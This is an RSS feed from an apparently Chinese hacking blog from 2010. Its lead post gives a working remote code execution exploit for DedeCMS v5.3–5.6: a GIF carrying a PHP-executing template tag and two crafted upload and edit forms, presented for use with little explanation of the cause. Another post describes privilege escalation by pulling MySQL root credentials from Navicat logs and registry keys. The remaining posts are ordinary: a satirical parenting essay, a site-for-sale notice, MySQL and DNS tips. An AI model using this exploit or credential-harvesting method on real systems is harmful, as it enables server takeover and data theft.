<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
<title><![CDATA[许诺's Blog]]></title>
<link>http://www.swhack.cn/</link>
<description><![CDATA[蝉在地下的漫长等待，只为枝头一夏的绝响！]]></description>
<language>zh-cn</language>
<copyright><![CDATA[Copyright 2005 PBlog3 v2.8]]></copyright>
<webMaster><![CDATA[251812239@qq.com(许诺)]]></webMaster>
<generator>PBlog2 v2.4</generator> 
<image>
	<title>许诺&#39;s Blog</title>
	<url>http://www.swhack.cn/images/logos.gif</url>
	<link>http://www.swhack.cn/</link>
	<description>许诺&#39;s Blog</description>
</image>

			<item>
			<link>http://www.swhack.cn/article.asp?id=285</link>
			<title><![CDATA[dedecms v5.3-v5.6 Get Shell 0day利用分析 ]]></title>
			<author>251812239@qq.com(许诺)</author>
			<category><![CDATA[0day ]]></category>
			<pubDate>Tue,17 Aug 2010 23:17:24 +0800</pubDate>
			<guid>http://www.swhack.cn/default.asp?id=285</guid>
		<description><![CDATA[author:toby57<br/>team:www.wolvez.org<br/><br/>此0day已经出现了相当长一段时间，今天配合小龙同学提供的日志看了下代码，了解了漏洞成因。大多同学对成因不感兴趣，这儿就只公布利用方法。<br/><br/>Gif89a{dede:field name=&#39;toby57&#39; runphp=&#39;yes&#39;}<br/>phpinfo();<br/>{/dede:field}<br/>保存为1.gif<br/><br/>&lt;form action=&#34;<a href="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" target="_blank" rel="external">http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php</a>&#34; method=&#34;post&#34; enctype=&#34;multipart/form-data&#34; &#34;&gt;<br/>&lt;input type=&#34;hidden&#34; name=&#34;aid&#34; value=&#34;<span style="color:Red">7</span>&#34; /&gt;<br/>&lt;input type=&#34;hidden&#34; name=&#34;mediatype&#34; value=&#34;1&#34; /&gt;<br/>&lt;input type=&#34;text&#34; name=&#34;oldurl&#34; value=&#34;/<span style="color:Red">DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif&#34; /</span>&gt;&lt;/br&gt;<br/>&lt;input type=&#34;hidden&#34; name=&#34;dopost&#34; value=&#34;save&#34; /&gt;<br/>&lt;input name=&#34;title&#34; type=&#34;hidden&#34; id=&#34;title&#34; value=&#34;1.jpg&#34; class=&#34;intxt&#34;/&gt;<br/>&lt;input name=&#34;addonfile&#34; type=&#34;file&#34; id=&#34;addonfile&#34;/&gt;<br/>&lt;button class=&#34;button2&#34; type=&#34;submit&#34; &gt;更改&lt;/button&gt;<br/>&lt;/form&gt;<br/>构造如上表单，上传后图片保存为/uploads/userup/3/1.gif<br/><img src="http://www.swhack.cn/download.asp?id=224" border="0" alt=""/><br/>发表文章，然后构造修改表单如下：<br/><div class="UBBPanel codePanel"><div class="UBBTitle"><a onClick="copycode(code28800);" style="float:right;cursor: pointer;font-weight: normal; font-style: normal">复制内容到剪贴板</a><img src="http://www.swhack.cn/images/code.gif" style="margin:0px 2px -3px 0px;" alt="程序代码"/> 程序代码</div><div class="UBBContent" id=code28800>&lt;form&nbsp;&nbsp;action=&#34;<a href="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" target="_blank" rel="external">http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php</a>&#34; method=&#34;post&#34; enctype=&#34;multipart/form-data&#34;&gt;<br/>&lt;input type=&#34;hidden&#34; name=&#34;dopost&#34; value=&#34;save&#34; /&gt;<br/>&lt;input type=&#34;hidden&#34; name=&#34;aid&#34; value=&#34;<span style="color:Red">2</span>&#34; /&gt;<br/>&lt;input type=&#34;hidden&#34; name=&#34;idhash&#34; value=&#34;<span style="color:Red">ec66030e619328a6c5115b55483e8dbd</span>&#34; /&gt;<br/>&lt;input type=&#34;hidden&#34; name=&#34;channelid&#34; value=&#34;1&#34; /&gt;<br/>&lt;input type=&#34;hidden&#34; name=&#34;oldlitpic&#34; value=&#34;&#34; /&gt;<br/>&lt;input type=&#34;hidden&#34; name=&#34;sortrank&#34; value=&#34;1282049150&#34; /&gt;&nbsp;&nbsp; <br/>&lt;input&nbsp;&nbsp;name=&#34;title&#34; type=&#34;text&#34; id=&#34;title&#34; value=&#34;aaaaaaaaaaaaaaa&#34; maxlength=&#34;100&#34; class=&#34;intxt&#34;/&gt;<br/>&lt;input type=&#34;text&#34; name=&#34;writer&#34; id=&#34;writer&#34; value=&#34;123456&#34; maxlength=&#34;100&#34; class=&#34;intxt&#34; style=&#34;width:219px&#34;/&gt;<br/>&lt;sel&#101;ct name=&#39;typeid&#39; size=&#39;1&#39;&gt;<br/>&lt;option value=&#39;1&#39; class=&#39;option3&#39; sel&#101;cted=&#39;&#39;&gt;Test&lt;/option&gt;<br/>&lt;sel&#101;ct name=&#39;mtypesid&#39; size=&#39;1&#39;&gt;<br/>&lt;option value=&#39;0&#39; sel&#101;cted&gt;请选择分类...&lt;/option&gt;<br/>&lt;option value=&#39;1&#39; class=&#39;option3&#39; sel&#101;cted&gt;aa&lt;/option&gt;&lt;/sel&#101;ct&gt; <br/>&lt;textarea name=&#34;description&#34; id=&#34;description&#34;&gt;aaaaaaaaaaaaa&lt;/textarea&gt;<br/>&lt;input type=&#39;hidden&#39; name=&#39;dede_addonfields&#39; value=&#34;templet&#34;&gt;<br/>&lt;input type=&#39;hidden&#39; name=&#39;templet&#39; value=&#34;<span style="color:Red">../uploads/userup/3/1.gif</span>&#34;&gt;<br/>&lt;input type=&#34;hidden&#34; id=&#34;body&#34; name=&#34;body&#34; value=&#34;aaaa&#34; style=&#34;display:none&#34; /&gt;<br/>&lt;button class=&#34;button2&#34; type=&#34;submit&#34;&gt;提交&lt;/button&gt;<br/>&lt;/form&gt;</div></div><br/><br/><img src="http://www.swhack.cn/download.asp?id=225" border="0" alt=""/><br/><br/><img src="http://www.swhack.cn/download.asp?id=226" border="0" alt=""/><br/><br/><img src="http://www.swhack.cn/download.asp?id=227" border="0" alt=""/><br/>红色部分都 是需要注意的地方，得根据实际情况进行对应修改。<br/>修改完成后查看文章即可。]]></description>
		</item>
		
			<item>
			<link>http://www.swhack.cn/article.asp?id=284</link>
			<title><![CDATA[哎 国内整顿越来越强力了]]></title>
			<author>251812239@qq.com(许诺)</author>
			<category><![CDATA[新闻琐事]]></category>
			<pubDate>Sun,15 Aug 2010 23:49:43 +0800</pubDate>
			<guid>http://www.swhack.cn/default.asp?id=284</guid>
		<description><![CDATA[黑色旋风站长被抓<br/><a href="http://bbs.77169.com" target="_blank">华夏</a> 黑基改版<br/><a href="http://www.swhack.cn" target="_blank">黑客</a>动画吧整改<br/><br/>今天凌晨刀客城也会关闭<br/><br/>t00ls貌似也准备内部化<br/><br/>越来越和谐。以后越来越难看到精品了]]></description>
		</item>
		
			<item>
			<link>http://www.swhack.cn/article.asp?id=283</link>
			<title><![CDATA[如何毁掉你的孩子[转载]]]></title>
			<author>251812239@qq.com(许诺)</author>
			<category><![CDATA[文字点滴]]></category>
			<pubDate>Mon,09 Aug 2010 19:17:19 +0800</pubDate>
			<guid>http://www.swhack.cn/default.asp?id=283</guid>
		<description><![CDATA[以下方法家长和老师可以通用，不同的是：家长毁一个，老师毁一群<br/><br/>首先应该做的是摧毁孩子的自尊，将孩子贬到卑微的地位上。具体方法有这样几条：<br/><br/>1、让孩子觉得自己什么都不行，没人赏识他。例如学习不行，长相不行，交际不行，干家务不行，马虎，粗心，让家人为他受累……总之，他没有行的地方。<br/><br/>2、经常拿比他&#34;行&#34;的人刺激他。例如这种话要时常挂在嘴边:&#34;看人家××，从不让父母操心!&#34;这类话最具打击力和摧毁力，是毁孩子的王牌语录。<br/><br/>3、父母把自己塑造成为家庭牺牲者的形象，这样会使孩子产生罪恶感。而一个有罪恶感的人往往采用自暴自弃的方法度过一生。具体方法举例如下:经常告诉孩子，自从有了他，你连电影也没看过，你为他操碎了心，都累出病来了，最好再具体说出你身上的哪种病是由于他造成的。或者说，如果不是为了照顾他，自己早就在事业上有大发展了。<br/><br/>4、和孩子说话时口气决不能和蔼，切不可使用商量的口吻，一定要使音量达到70分贝以上，一定要使用命令式的口吻。如果还能配合一些挖苦讽刺的汉语词组，则效果更佳。如&#34;你真蠢&#34;&#34;你混&#34;&#34;没见过你这么傻的&#34;&#34;怎么生了你这么个东西&#34;等等。<br/><br/>5、孩子的一切要由你来决定，切不可给他一点儿自由，他的行踪你要密切注视。他如果有日记，一定要设法查看;他如果有信件，一定要审查。这样做能在他心里造成他不是人的感觉，造成他是一个受人操纵的木偶的感觉。一个怀疑自己不是人的人是绝不可能奋发上进的。<br/><br/>6、要学会迁怒的本事。单位上遇到不顺心的事，回来后要想方设法找理由给孩子泼狗血。无论什么事都归功于孩子的过错然后教训他，并制止他流眼泪。这样做可以有效地打击孩子的自尊心，增强孩子的自卑感，同样可以造成他不是人的感觉。<br/><br/>7、当众出孩子的丑。前6条都是在家庭里的&#34;单练&#34;。真正要彻底毁掉他，这第7条才是杀手锏。你一定要当着外人(或同学或亲友或邻居)损他，贬他，让他无地自容。从心理学角度讲，这样做能使一个人产生惧怕社会的心理，产生自惭形秽的念头。而一个惧怕社会和自惭形秽的人是很难立足於社会的。<br/><br/><br/><br/>您掌握了以上7条，就基本上可以毁掉自己的孩子了。当然，还得在实践中不断总结经验，做到运用自如，这样才能将你的孩子彻底毁掉，使他终身一事无成。]]></description>
		</item>
		
			<item>
			<link>http://www.swhack.cn/article.asp?id=281</link>
			<title><![CDATA[出售一个日流量22W的站和XX站聊天室房间]]></title>
			<author>251812239@qq.com(许诺)</author>
			<category><![CDATA[成长之路]]></category>
			<pubDate>Fri,30 Jul 2010 10:35:21 +0800</pubDate>
			<guid>http://www.swhack.cn/default.asp?id=281</guid>
		<description><![CDATA[站点为同志交友类型<br/><br/>现在日流量22W左右了<br/><br/>需要的自己报价给我。 直接邮件给我或者QQ<br/><br/>另外代朋友半价出售XX UC聊天室（百度第一个）所有东西 包括各类型房间<br/><br/>邮箱hack@swhack.cn&nbsp;&nbsp;<br/><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.swhack.cn/article.asp?id=280</link>
			<title><![CDATA[利用navicat提权]]></title>
			<author>251812239@qq.com(许诺)</author>
			<category><![CDATA[技术转载]]></category>
			<pubDate>Wed,28 Jul 2010 23:26:56 +0800</pubDate>
			<guid>http://www.swhack.cn/default.asp?id=280</guid>
		<description><![CDATA[navicat是一个比较流行的MySQL管理工具，在很多服务器上都可以找到&nbsp;&nbsp;<br/>有两个方法提权： .<br/>1、从日志文件里找密码，navicat会把操作日志（比如加账户）保存到My Documents\Navicat\MySQL\logs下的LogHistory.txt，低版本是安装目录下的logs下LogHistory.txt&nbsp;&nbsp;<br/>2、navicat管理的MySQL服务器信息（一般是root帐户）是存在注册表里的，具体是HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers下，导出注册表导入到本机然后星号察看就OK了。。 <br/><br/>作者不祥，所以未有版<br/><br/><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.swhack.cn/article.asp?id=279</link>
			<title><![CDATA[根据你的QQ号可以算出你的年龄]]></title>
			<author>251812239@qq.com(许诺)</author>
			<category><![CDATA[黑白心情]]></category>
			<pubDate>Wed,28 Jul 2010 09:05:22 +0800</pubDate>
			<guid>http://www.swhack.cn/default.asp?id=279</guid>
		<description><![CDATA[1.获取你QQ号码的第一位 <br/><br/>2.用你QQ号码的第一位乘以五 <br/><br/>3.把这个数加上8 <br/><br/>4.再把所得的结果乘以20 <br/><br/>5.如果你的生日过了，加1848，如果没过，加1847 <br/><br/>6.把所得结果减去你的出生年份 <br/><br/>7.现在你会得到一个3位数 <br/><br/>8.百位上的数字就是你的QQ号码的第一位 <br/><br/>9.十位和个位就成了一个两位数，用这个数加上3就是你的年龄了。 <br/><br/>10.准不准、 <br/>]]></description>
		</item>
		
			<item>
			<link>http://www.swhack.cn/article.asp?id=278</link>
			<title><![CDATA[交换链接的事项]]></title>
			<author>251812239@qq.com(许诺)</author>
			<category><![CDATA[黑白心情]]></category>
			<pubDate>Tue,27 Jul 2010 17:40:05 +0800</pubDate>
			<guid>http://www.swhack.cn/default.asp?id=278</guid>
		<description><![CDATA[以后交换链接只做PR&gt;3的，小于3的如果要做，我会放在内页。<br/>而且不是同类的技术类站点，不予链接了，内容独特的除外。<br/>没办法，百度对我俗气，把我关键字全部降权了。所以我也只有俗气一回了。<br/>另外把本站放在内页的。我会相应删除你的链接，同时也请你删除我的。<br/>希望理解<br/>]]></description>
		</item>
		
			<item>
			<link>http://www.swhack.cn/article.asp?id=277</link>
			<title><![CDATA[win2003偶尔出现Can not connect to MySQL server]]></title>
			<author>251812239@qq.com(许诺)</author>
			<category><![CDATA[技术转载]]></category>
			<pubDate>Wed,21 Jul 2010 17:23:44 +0800</pubDate>
			<guid>http://www.swhack.cn/default.asp?id=277</guid>
		<description><![CDATA[这几天有MySQL数据库服务器频繁出现掉线，经排查，并没有受攻击，网上搜索了一下，很多人都碰到这问题，全是Windows系统上安装MySQL，原因是前段时间微软发布的补丁KB967723而导致的。现在有两种解决方法：<br/><br/>第一种：卸载KB967723补丁<br/>登录服务器，进入控制面板 — 添加和删除程序 — （勾选上方的“显示更新”）在里面可以看到更新的KB967723这个补丁，然后就想卸载普通软件一样卸载，卸载中会提示你，如果卸载可能导致程序运行出错，没关系，选择“是”，继续卸载。卸载完成后重启数据库服务器。<br/><br/>第二种：修改注册表<br/>本方法是微软给出的修改注册表修复该Bug的的方法，原因是默认最大的临时 TCP 端口的数是 5000 适用于一节中包含的产品中。 在这些产品中添加一个新参数。 要提高临时端口的上限，请按照下列步骤操作：<br/><br/>开始 → 运行 → 输入regedit → 启动注册表编辑器。 <br/>在注册表中找到以下子项，然后单击 参数 ： <br/>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters<br/>在 编辑 菜单上单击 新建，然后添加下面的注册表项： <br/>数值名称： MaxUserPort <br/>值类型: DWORD<br/>值数据： 65534<br/>有效范围： 5000-65534 (十进制)<br/>默认值： 0x1388 (5000 十进制)<br/>说明： 此参数将控制程序从系统请求任何可用的用户端口时使用的最大端口数。 通常，1024 的值和包含的 5000 之间分配临时的 （短) 端口。<br/>退出注册表编辑器，并重新启动计算机。 <br/>微软原文链接：<a href="http://support.microsoft.com/kb/q196271" target="_blank" rel="external">http://support.microsoft.com/kb/q196271</a><br/><br/> <br/><br/>现此问题的原因是因为微软2009年发布了TCP/IP更新补丁（KB967723），如果服务器开启自动更新或者有自动更新软件下载更新了这个补丁，那么就会出现这个问题。出现Can not connect to MySQL server错误<br/><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.swhack.cn/article.asp?id=276</link>
			<title><![CDATA[Web服务器负载均衡的几种方案 : DNS轮询]]></title>
			<author>251812239@qq.com(许诺)</author>
			<category><![CDATA[技术转载]]></category>
			<pubDate>Sun,18 Jul 2010 23:39:46 +0800</pubDate>
			<guid>http://www.swhack.cn/default.asp?id=276</guid>
		<description><![CDATA[DNS轮询 <br/><br/>大多域名注册商都支持多条A记录 的解析，其实这就是DNS轮询 ，DNS 服务器 将解析请求按照A记录 的顺序，逐一分配到不同的IP上，这样就完成了简单的负载均衡 。 <br/><br/><br/>优点<br/><br/>基本上无成本，因为往往域名注册商的这种解析都是免费的；&nbsp;&nbsp;<br/>部署方便，除了网络拓扑的简单扩增，新增的Web服务器只要增加一个公网IP即可。 <br/>&nbsp;&nbsp;<br/>缺点<br/><br/>健康检查，如果某台服务器宕机，DNS服务器是无法知晓的，仍旧会将访问分配到此服务器。修改DNS记录全部生效起码要3-4小时，甚至更久；&nbsp;&nbsp;<br/>分配不均，如果几台Web服务器之间的配置不同，能够承受的压力也就不同，但是DNS解析分配的访问却是均匀分配的。其实DNS也是有分配算法的，可以根据当前连接较少的分配、可以设置Rate权重分配等等，只是目前绝大多数的DNS服务器都不支持；&nbsp;&nbsp;<br/>会话保持，如果是需要身份验证的网站，在不修改软件构架的情况下，这点是比较致命的，因为DNS解析无法将验证用户的访问持久分配到同一服务器。虽然有一定的本地DNS缓存，但是很难保证在用户访问期间，本地DNS不过期，而重新查询服务器并指向新的服务器，那么原服务器保存的用户信息是无法被带到新服务器的，而且可能要求被重新认证身份，来回切换时间长了各台服务器都保存有用户不同的信息，对服务器资源也是一种浪费。 <br/>&nbsp;&nbsp;<br/>部署方法&nbsp;&nbsp; <br/><br/>这个是万网的域名控制面板，将同一域名解析到2条A记录 上。<br/><img src="http://www.swhack.cn/download.asp?id=222" border="0" alt=""/><br/><br/>这个是免费的智能DNS 解析服务，www.dns pod.com，不仅可以多条A记录 ，而且还能使用中国特色，根据电信、网通、教育网的用户访问，解析到不同的IP上。 <br/><img src="http://www.swhack.cn/download.asp?id=223" border="0" alt=""/><br/><br/>实验&nbsp;&nbsp; <br/><br/>先将www.fuckegg.com的A记录 解析到x.x.x.x和x.x.x.n上，然后使用nslookup工具查看。<br/>直接用cmd命令nslookup看到 解析到了两个IP了<br/><br/>关于DNS 服务器 的压力问题，其实并不用太过担心，因为解析记录通常都是有一小时的缓存的，如果用户最近一级的DNS 服务器 上的解析记录还未过期的话，是不用查询主服务器 的，通常DNS 都有一小时的缓存，所以这样就等于把压力分摊到了各用户最近一级的DNS 服务器 上了。<br/>]]></description>
		</item>
		
			<item>
			<link>http://www.swhack.cn/article.asp?id=274</link>
			<title><![CDATA[闲言闲语不必理会]]></title>
			<author>251812239@qq.com(许诺)</author>
			<category><![CDATA[黑白心情]]></category>
			<pubDate>Tue,06 Jul 2010 23:46:39 +0800</pubDate>
			<guid>http://www.swhack.cn/default.asp?id=274</guid>
		<description><![CDATA[多赚点钱，但不要多到谁看你，你都会觉得其只是看你的钱的地步。。。在26岁之前，一切都是有可能的。不论别人怎么说你 怎么看你，自己有信心。<br/><br/>当你发现为时已晚的时候，恰恰是最好的开始~！<br/><br/>暑假目标&nbsp;&nbsp;c++攻克&nbsp;&nbsp;java看至多线程]]></description>
		</item>
		
</channel>
</rss>
